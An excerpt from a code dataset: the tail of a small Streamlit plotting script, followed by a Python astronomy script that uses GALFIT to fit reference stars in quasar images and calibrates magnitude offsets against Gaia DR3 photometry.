plt.axis([0,10,0,30]) #fissare l'asse \n st.pyplot(fig)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Ahmexxx/app","sub_path":"atest/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6204303994","text":"import numpy as np\nimport os\nfrom pathlib import Path\nfrom astropy.io import fits\nfrom astropy.stats import sigma_clipped_stats\nfrom scipy.stats import iqr\nimport sys\n\nlocal = (str(os.path.abspath(os.getcwd())))\npath = Path(local)\nprint('local path:', path)\n\nreftime = str(input('Enter time intervall of refimage (e.g. \"2014-22\"): '))\n\nreffile = list(path.glob('ref*'+reftime+'.fits'))\nreffile_error = list(path.glob('error_ref*'+reftime+'.fits'))\nif len(reffile) != 1 or len(reffile_error) != 1:\n print('#### REFERENCE FILE ERROR ####')\n sys.exit('Interrupting galref_apparentmagoffset.py')\n\ndef make_galfit_input_file(data_file_name, error_file_name, object_region, position, fluxesti, second_fit):\n galfit_input_txt = open(\"galfit.input\", \"w\")\n galfit_input_txt.write(\"A) \"+str(data_file_name)+\" \\n\" +\n \"B) out.fits \"+\"\\n\" +\n \"C) \"+str(error_file_name)+\" \\n\" +\n \"D) psf.fits \"+\"\\n\" +\n \"E) 1 \"+\"\\n\" +\n \"F) \"+\"\\n\" +\n \"G) \"+\"\\n\" +\n \"H) \"+str(object_region)+\" \\n\" +\n \"I) 51 51 \"+\"\\n\" +\n \"J) 25.000 \"+\"\\n\" +\n \"K) 0.387 0.387 \"+\"\\n\" +\n \"O) regular \"+\"\\n\" +\n \"P) 0 \"+\"\\n\" +\n \"S) 0 \"+\"\\n\" +\n \"0) q2237 \"+\"\\n\" +\n \" 1) \"+str(position)+\" 1 1 \"+\"\\n\" +\n \" 3) \"+str(fluxesti)+\" 1 \"+\"\\n\" +\n \" 4) \"+str(second_fit)+\"\\n\" +\n \" 5) 0.0 0 \"+\"\\n\" +\n \" 6) 0.0 0 \"+\"\\n\" +\n \" 7) 0.0000 0 \"+\"\\n\" +\n \" 8) 1.0000 0 \"+\"\\n\" +\n \" 9) 0.0000 0 \"+\"\\n\" +\n \"10) 0.0000 0 \"+\"\\n\" +\n \" Z) 0 \"+\"\\n\" +\n \" 0) sky \"+\"\\n\" +\n \" 1) 10.0 1 \"+\"\\n\" +\n \" 2) 0.0000 0 \"+\"\\n\" +\n \" 3) 0.0000 0 \"+\"\\n\" +\n \" Z) 0 \")\n galfit_input_txt.close()\n\n# ref-stars:\n# initial guesses for star positions for aperture photometry for scale factors:\n# q2237:\n\n\nif str(path).find('q2237') != -1:\n print('refstars of quasar: q2237')\n initial_positions = np.array([[1578.0, 1825.0], [1600.0, 1586.0], [2066.0, 1498.0], [2203.0, 1689.0], [1890.0, 1904.0],\n [1837.0, 2049.0], [1677.0, 1991.0], [1271.0, 1603.0], [2191.0, 2213.0], [2421.0, 2327.0],\n [1721.0, 2276.0], [1505.0, 2288.0], [1339.0, 2281.0], [1052.0, 1921.0], [ 812.0, 1835.0],\n [ 874.0, 1565.0], [1123.0, 1287.0], [1408.0, 1368.0], [2055.0, 1346.0], [2732.0, 1166.0],\n [3266.0, 2570.0]])\n# he2149:\nif str(path).find('he2149') != -1:\n print('refstars of quasar: he2149')\n initial_positions = np.array([[2013.0, 1854.0], [1274.0, 1823.0], [1280.0, 1650.0], [2150.0, 1518.0], [2239.0, 1552.0],\n [2199.0, 1889.0], [2482.0, 1831.0], [1851.0, 1891.0], [1086.0, 1854.0], [1043.0, 1618.0],\n [ 993.0, 1574.0], [ 959.0, 1523.0], [1190.0, 1986.0], [ 507.0, 1928.0], [ 656.0, 1384.0],\n [1602.0, 1381.0], [1823.0, 1359.0], [2387.0, 1375.0], [2898.0, 2169.0], [2733.0, 2107.0],\n [2318.0, 2246.0], [1793.0, 2304.0], [1595.0, 1049.0], [1504.0, 763.0]])\n# he1104:\nif str(path).find('he1104') != -1:\n print('refstars of quasar: he1104')\n initial_positions = np.array([[1816.0, 1649.0], [1847.0, 1657.0], [2080.0, 1895.0], [2159.0, 1977.0], [1354.0, 1910.0],\n [1210.0, 1983.0], [1662.0, 882.0], [ 977.0, 900.0], [2814.0, 1040.0], [3018.0, 1638.0],\n [2849.0, 2156.0], [2228.0, 2063.0], [1742.0, 2317.0], [1304.0, 2398.0], [ 364.0, 2267.0],\n [ 992.0, 1694.0], [1087.0, 1443.0], [1826.0, 1707.0], [1805.0, 1760.0], [2342.0, 729.0],\n [ 782.0, 1648.0], [3082.0, 737.0]])\n\n# converts to ['abcd wxyz',...] where abcd and wxyz are the ds9 pixel positions (in the order given by ds9):\nref_positions = [str(np.array(x, dtype=int))[1:-1]\n for x in initial_positions.tolist()]\n\n# print(ref_positions)\n\n# ref_regions:\nhalfside = 15 # size (half side) of region around ref-stars\nref_regions = []\nfor position in ref_positions:\n xy_pos = position.split()\n center = np.floor(\n np.array([float(xy_pos[0]), float(xy_pos[1])])).astype(int)\n edge1, edge2, edge3, edge4 = center[0]-halfside, center[0] + \\\n halfside, center[1]-halfside, center[1]+halfside\n region = str(edge1)+' '+str(edge2)+' '+str(edge3)+' '+str(edge4)\n ref_regions.append(region)\n# print(ref_regions)\n\nreffile = str(reffile[0]).replace(str(path)+'/', '')\nreffile_error = str(reffile_error[0]).replace(str(path)+'/', '')\nprint('reffile:', reffile)\ndata = fits.open(reffile)\n# remove possible remaining background from ref-image:\nmean, median, std = sigma_clipped_stats(\n data[0].data[100:-100, 100:-100], sigma=3.0, std_ddof=1)\nbackground = median\n# std i.e. typical fluctuation size of the individual background pixels\nerror_background = std\n# Der Fehler des Hintergrunds wurde im ursprünglichen combining schon im Fehlerbild berücksichtigt (nur in den diff-Versuchen manchmal wieder das negative minimum im Bild dazuaddiert und abgespeichert)\nprint('ref-image background =', background, '+/-', error_background)\nrefimage_backred = data[0].data - background\nprint('make psf.fits')\nif str(path).find('q2237') != -1:\n psf_cutout = refimage_backred[2120:2150, 2213:2243]\nif str(path).find('he2149') != -1:\n psf_cutout = refimage_backred[1703:1733, 1786:1816]\nif str(path).find('he1104') != -1:\n psf_cutout = refimage_backred[1770:1800, 1700:1730]\npsf_fits = fits.PrimaryHDU(psf_cutout)\npsf_fits = fits.HDUList([psf_fits])\npsf_fits[0].data = psf_cutout\npsf_fits.writeto('psf.fits', overwrite=True)\n\nref_fluxes = np.zeros(len(ref_regions))\nprint('reference star measurements:')\nfor ref_star in range(len(ref_regions)):\n print('refstar no.', str(ref_star+1))\n refstar_region = ref_regions[ref_star]\n refstar_position = ref_positions[ref_star]\n no_second_fit = ' 0.0 0'\n fluxestimate = '50000.0'\n make_galfit_input_file(reffile, reffile_error, refstar_region,\n refstar_position, fluxestimate, no_second_fit)\n # execute galfit with no console-output\n os.system('./galfit galfit.input > /dev/null')\n os.system('rm galfit.??') # remove extra files produced by galfit\n os.system('rm out.fits') # remove output fits file\n try:\n with open('fit.log') as f:\n galfit_ref_results = f.readlines()[7:9]\n # print(galfit_ref_results)\n os.system('rm fit.log') # remove fit.log\n except:\n print('refstar-galfit-error with refstar',\n str(ref_star+1), '! --> skipped!')\n continue\n ref_star_flux = galfit_ref_results[0].split()[4]\n if ')' in ref_star_flux:\n ref_fluxes[ref_star] = galfit_ref_results[0].split()[5]\n elif ',' in ref_star_flux:\n ref_fluxes[ref_star] = galfit_ref_results[0].split()[6]\n else:\n ref_fluxes[ref_star] = ref_star_flux\n\nprint('refstar fluxes:',ref_fluxes)\nref_mag = -2.5*np.log10(ref_fluxes)\nprint('calculated refstar magnitudes:',ref_mag)\n\n# Compare refstar magnitudes with true values from GAIA data:\n\n\ndef GAIA_GminusV(Gbp, Grp):\n x = Gbp-Grp\n return -0.02704+0.01424*x-0.2156*x**2+0.01426*x**3\n\n\ndef GAIA_GminusR(Gbp, Grp):\n x = Gbp-Grp\n return -0.02275+0.3961*x-0.1243*x**2-0.01396*x**3+0.003775*x**4\n\n\ndef GAIA_V(GminusV, G):\n return G-GminusV\n\n\ndef GAIA_R(GminusR, G):\n return G-GminusR\n\nif str(path).find('q2237') != -1:\n GAIAdata_table = '../q2237gaiaDR3table.csv'\nif str(path).find('he2149') != -1:\n GAIAdata_table = '../he2149gaiaDR3table.csv'\nif str(path).find('he1104') != -1:\n GAIAdata_table = '../he1104gaiaDR3table.csv'\n\nG,Gbp,Grp,compareRApm,compareDECpm = np.genfromtxt(GAIAdata_table,dtype=float,skip_header=1,delimiter=',',usecols=(69,74,79,13,15),unpack=True)\n# print(G,Gbp,Grp)\n\nif str(path).find('/V/') != -1:\n GAIA_ref_mag = GAIA_V(GAIA_GminusV(Gbp, Grp), G)\n\nif str(path).find('/R/') != -1:\n GAIA_ref_mag = GAIA_R(GAIA_GminusR(Gbp, Grp), G)\n\n# print(GAIA_ref_mag)\n\nRA,DEC,RApm,DECpm = np.loadtxt('../gaia_pixelpositionandpm_list.txt',skiprows=1,usecols=(0,1,2,3),unpack=True)\n# print(RA,DEC)\n# print(len(RA),len(GAIA_ref_mag))\n\ncounter = 0\nfor i in range(len(compareRApm)):\n pmdiff = np.sqrt((compareRApm[i]-RApm)**2+(compareDECpm[i]-DECpm)**2)\n mindex = np.argmin(pmdiff)\n if pmdiff[mindex] == 0.0:\n # pmdiff[mindex] should be zero\n #print(pmdiff[mindex],compareRApm[i],RApm[mindex],compareDECpm[i],DECpm[mindex])\n counter = counter + 1\nGAIA_RA = np.zeros(counter)\nGAIA_DEC = np.zeros(counter)\nGAIA_MAG = np.zeros(counter)\ncounter2 = 0\nfor i in range(len(compareRApm)):\n pmdiff = np.sqrt((compareRApm[i]-RApm)**2+(compareDECpm[i]-DECpm)**2)\n mindex = np.argmin(pmdiff)\n if pmdiff[mindex] == 0.0:\n GAIA_RA[counter2] = RA[mindex]\n GAIA_DEC[counter2] = DEC[mindex]\n GAIA_MAG[counter2] = GAIA_ref_mag[i]\n counter2 = counter2 + 1\n\n#print(GAIA_RA,GAIA_DEC,GAIA_MAG)\n\n# match GAIA data to refstars:\nref_mag_GAIA = np.zeros(len(ref_mag))\nmatch_counter = 10.0 # distance in pixels must be below this to have a match\ntrimmedpixel = 100 # between aligning and combining/galfitting\nfor i in range(len(ref_mag)):\n # starpmRA/DEC_forgooddata will be written to good.data and:\n distance = np.sqrt((initial_positions[i][0]-(GAIA_RA-trimmedpixel))**2+(initial_positions[i][1]-(GAIA_DEC-trimmedpixel))**2)\n mindex = np.argmin(distance)\n print('distance of best match:',distance[mindex])\n if distance[mindex] < 15.0: \n #print(distance[mindex],initial_positions[i][0],GAIA_RA[mindex]-trimmedpixel,initial_positions[i][1],GAIA_DEC[mindex]-trimmedpixel)\n ref_mag_GAIA[i] = GAIA_MAG[mindex]\n else:\n print('no match --> mag set to NAN')\n ref_mag_GAIA[i] = np.nan\n\nprint('refstar magnitudes from GAIA:',ref_mag_GAIA)\ndiff_mag = ref_mag_GAIA-ref_mag\nprint('difference of refstar magnitudes GAIA-GALFIT:',diff_mag)\nprint('####')\noffset = np.nanmedian(diff_mag)\nofferr = iqr(diff_mag,nan_policy='omit')/2.0\nprint('magnitude offset, i.e. median of the differences (with iqr error):')\nprint('offset =',offset,'+/-',offerr)\nprint('####')\n\ntxt = open(\"refimage_\"+reftime+\"_magnitude_offset.txt\", \"w\")\ntxt.write(\"offset\"+\"\\t\\t\\t\"+\"error\"+\"\\n\")\ntxt.write(str(offset)+\"\\t\"+str(offerr))\ntxt.close()\nprint('offset written in txt-file:',\"refimage_\"+reftime+\"_magnitude_offset.txt\") \nprint('galref_apparentmagoffset.py is finished!')","repo_name":"sorgenfrei-c95/qsoMLdiffcurves","sub_path":"galref_apparentmagoffset.py","file_name":"galref_apparentmagoffset.py","file_ext":"py","file_size_in_byte":11198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}